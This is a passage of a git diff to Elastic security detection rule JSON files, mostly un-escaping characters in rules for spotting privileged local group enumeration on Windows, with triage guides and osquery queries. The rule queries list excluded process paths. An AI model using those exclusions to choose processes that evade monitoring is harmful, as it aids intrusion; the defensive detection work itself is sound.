`event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json index 1b02d63f0c3..5eb28b17b4d 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_208.json @@ -19,7 +19,7 @@ "winlog.event_data.SubjectUserName", "winlog.event_data.CallerProcessName" ], - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (winlog.event_data.SubjectUserName: (*$ or \"LOCAL SERVICE\" or \"NETWORK SERVICE\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", "related_integrations": [ { @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the event used in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json index 8161b04e217..dbdb9379856 100644 --- a/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json +++ b/packages/security_detection_engine/kibana/security_rule/291a0de9-937a-4189-94c0-3e847c8b13e4_209.json @@ -19,7 +19,7 @@ "winlog.event_data.SubjectUserName", "winlog.event_data.CallerProcessName" ], - "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Privileged Local Groups Membership\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the enumeration of privileged local groups' membership by suspicious processes, and excludes known legitimate utilities and programs installed. Attackers can use this information to decide the next steps of the attack, such as mapping targets for credential compromise and other post-exploitation activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process, host and user involved on the event.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type:windows and event.category:iam and event.action:user-member-enumerated and \n (\n group.name:(*Admin* or \"RemoteDesktopUsers\") or\n winlog.event_data.TargetSid:(\"S-1-5-32-544\" or \"S-1-5-32-555\")\n ) and \n not (winlog.event_data.SubjectUserName: (*$ or \"LOCAL SERVICE\" or \"NETWORK SERVICE\") or \n winlog.event_data.CallerProcessName:(\"-\" or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\VSSVC.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SearchIndexer.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CompatTelRunner.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\oobe\\\\\\\\msoobe.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\net1.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Netplwiz.exe or \n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\CloudExperienceHostBroker.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wbem\\\\\\\\WmiPrvSE.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SrTasks.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\diskshadow.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dfsrs.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\vssadmin.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\dllhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mmc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SettingSyncHost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\inetsrv\\\\\\\\w3wp.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wsmprovhost.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\spool\\\\\\\\drivers\\\\\\\\x64\\\\\\\\3\\\\\\\\x3jobt3?.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\mstsc.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\esentutl.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\RecoveryDrive.exe or\n *\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\SystemPropertiesComputerName.exe or\n *\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\msiexec.exe or\n *\\:\\\\\\\\Windows\\\\\\\\ImmersiveControlPanel\\\\\\\\SystemSettings.exe or\n *\\:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\rubrik_vmware???\\\\\\\\snaptool.exe or\n *\\:\\\\\\\\Windows\\\\\\\\VeeamVssSupport\\\\\\\\VeeamGuestHelper.exe or\n ?\\:\\\\\\\\WindowsAzure\\\\\\\\*WaAppAgent.exe or\n ?\\:\\\\\\\\Program?Files?\\(x86\\)\\\\\\\\*.exe or\n ?\\:\\\\\\\\Program?Files\\\\\\\\*.exe or\n ?\\:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\*.exe\n )\n )\n", "related_integrations": [ { @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "291a0de9-937a-4189-94c0-3e847c8b13e4", - "setup": "\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nAccount Management \u003e\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThe 'Audit Security Group Management' audit policy must be configured (Success).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit Security Group Management (Success)\n```\n\nMicrosoft introduced the [event used](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4799) in this detection rule on Windows 10 and Windows Server 2016 or later operating systems.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json index 2f5a6eb3d51..a2cd94cf6a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/29b53942-7cd4-11ee-b70e-f661ea17fbcd_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json b/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json index c262e30cb18..c71d9a20d92 100644 --- a/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json +++ b/packages/security_detection_engine/kibana/security_rule/29ef5686-9b93-433e-91b5-683911094698_1.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json index f24dc5d0cc9..397f70bf340 100644 --- a/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json +++ b/packages/security_detection_engine/kibana/security_rule/29f0cf93-d17c-4b12-b4f3-a433800539fa_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux SSH X11 Forwarding", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == 